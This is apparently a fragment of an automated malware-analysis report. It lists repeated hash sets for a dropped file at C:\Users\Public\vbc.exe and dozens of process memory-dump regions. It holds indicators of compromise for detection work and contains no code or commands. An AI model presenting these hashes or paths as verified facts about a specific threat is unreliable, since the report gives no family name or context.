SHA2567460ae6d2231ecda0b194508308e757a375af4da5ce4e979645a7764fa680dc4
SHA512630a1b0955d9edded5b0393a2e2296280f7e115e7175cf1b56882fe1b787c74f4c9516927d3028784f5435db193c09e9716cf940e4b0c9a2b380f0696cb22e3b
-
C:\Users\Public\vbc.exeFilesize
977KB
MD50bbeb58e735d6bd4d0d30f150c36a15e
SHA18f63aa459a56f8fb80105e78537ef8189f1b92d6
SHA256efd5a5231f12bcaa48f701b82ff32314b313e5484fabe8596a7ce9283a08f71c
SHA512ac69a141e676a6115456db98b4d69dc7ffbcbb0001dc4d5a37259dbab1bacf7fb07712253f515e1848923665ce5d325c73276dfe0894f78e64e8d02422091c27
-
C:\Users\Public\vbc.exeFilesize
977KB
MD50bbeb58e735d6bd4d0d30f150c36a15e
SHA18f63aa459a56f8fb80105e78537ef8189f1b92d6
SHA256efd5a5231f12bcaa48f701b82ff32314b313e5484fabe8596a7ce9283a08f71c
SHA512ac69a141e676a6115456db98b4d69dc7ffbcbb0001dc4d5a37259dbab1bacf7fb07712253f515e1848923665ce5d325c73276dfe0894f78e64e8d02422091c27
-
C:\Users\Public\vbc.exeFilesize
977KB
MD50bbeb58e735d6bd4d0d30f150c36a15e
SHA18f63aa459a56f8fb80105e78537ef8189f1b92d6
SHA256efd5a5231f12bcaa48f701b82ff32314b313e5484fabe8596a7ce9283a08f71c
SHA512ac69a141e676a6115456db98b4d69dc7ffbcbb0001dc4d5a37259dbab1bacf7fb07712253f515e1848923665ce5d325c73276dfe0894f78e64e8d02422091c27
-
C:\Users\Public\vbc.exeFilesize
977KB
MD50bbeb58e735d6bd4d0d30f150c36a15e
SHA18f63aa459a56f8fb80105e78537ef8189f1b92d6
SHA256efd5a5231f12bcaa48f701b82ff32314b313e5484fabe8596a7ce9283a08f71c
SHA512ac69a141e676a6115456db98b4d69dc7ffbcbb0001dc4d5a37259dbab1bacf7fb07712253f515e1848923665ce5d325c73276dfe0894f78e64e8d02422091c27
-
C:\Users\Public\vbc.exeFilesize
977KB
MD50bbeb58e735d6bd4d0d30f150c36a15e
SHA18f63aa459a56f8fb80105e78537ef8189f1b92d6
SHA256efd5a5231f12bcaa48f701b82ff32314b313e5484fabe8596a7ce9283a08f71c
SHA512ac69a141e676a6115456db98b4d69dc7ffbcbb0001dc4d5a37259dbab1bacf7fb07712253f515e1848923665ce5d325c73276dfe0894f78e64e8d02422091c27
-
\Users\Public\vbc.exeFilesize
977KB
MD50bbeb58e735d6bd4d0d30f150c36a15e
SHA18f63aa459a56f8fb80105e78537ef8189f1b92d6
SHA256efd5a5231f12bcaa48f701b82ff32314b313e5484fabe8596a7ce9283a08f71c
SHA512ac69a141e676a6115456db98b4d69dc7ffbcbb0001dc4d5a37259dbab1bacf7fb07712253f515e1848923665ce5d325c73276dfe0894f78e64e8d02422091c27
-
\Users\Public\vbc.exeFilesize
977KB
MD50bbeb58e735d6bd4d0d30f150c36a15e
SHA18f63aa459a56f8fb80105e78537ef8189f1b92d6
SHA256efd5a5231f12bcaa48f701b82ff32314b313e5484fabe8596a7ce9283a08f71c
SHA512ac69a141e676a6115456db98b4d69dc7ffbcbb0001dc4d5a37259dbab1bacf7fb07712253f515e1848923665ce5d325c73276dfe0894f78e64e8d02422091c27
-
memory/1248-207-0x000000005FFF0000-0x0000000060000000-memory.dmpFilesize
64KB
-
memory/1248-54-0x000000005FFF0000-0x0000000060000000-memory.dmpFilesize
64KB
-
memory/1316-169-0x0000000000400000-0x0000000000430000-memory.dmpFilesize
192KB
-
memory/1316-171-0x0000000000400000-0x0000000000430000-memory.dmpFilesize
192KB
-
memory/1316-179-0x0000000000440000-0x0000000000480000-memory.dmpFilesize
256KB
-
memory/1316-176-0x0000000000400000-0x0000000000430000-memory.dmpFilesize
192KB
-
memory/1316-174-0x0000000000400000-0x0000000000430000-memory.dmpFilesize
192KB
-
memory/1316-166-0x0000000000400000-0x0000000000430000-memory.dmpFilesize
192KB
-
memory/1316-167-0x0000000000400000-0x0000000000430000-memory.dmpFilesize
192KB
-
memory/1316-168-0x0000000000400000-0x0000000000430000-memory.dmpFilesize
192KB
-
memory/1316-170-0x000000007EFDE000-0x000000007EFDF000-memory.dmpFilesize
4KB
-
memory/1488-155-0x0000000007F30000-0x0000000007FDA000-memory.dmpFilesize
680KB
-
memory/1488-153-0x0000000004E00000-0x0000000004E40000-memory.dmpFilesize
256KB
-
memory/1488-152-0x0000000000620000-0x000000000063A000-memory.dmpFilesize
104KB
-
memory/1488-154-0x00000000005C0000-0x00000000005CC000-memory.dmpFilesize
48KB
-
memory/1488-162-0x00000000012F0000-0x0000000001322000-memory.dmpFilesize
200KB
-
memory/1488-161-0x0000000000D80000-0x0000000000D86000-memory.dmpFilesize
24KB
-
memory/1488-146-0x0000000004E00000-0x0000000004E40000-memory.dmpFilesize
256KB
-
memory/1488-145-0x0000000001320000-0x000000000141A000-memory.dmpFilesize
1000KB
-
memory/1936-177-0x0000000000490000-0x00000000004D0000-memory.dmpFilesize
256KB
-
memory/1936-178-0x0000000000490000-0x00000000004D0000-memory.dmpFilesize
256KB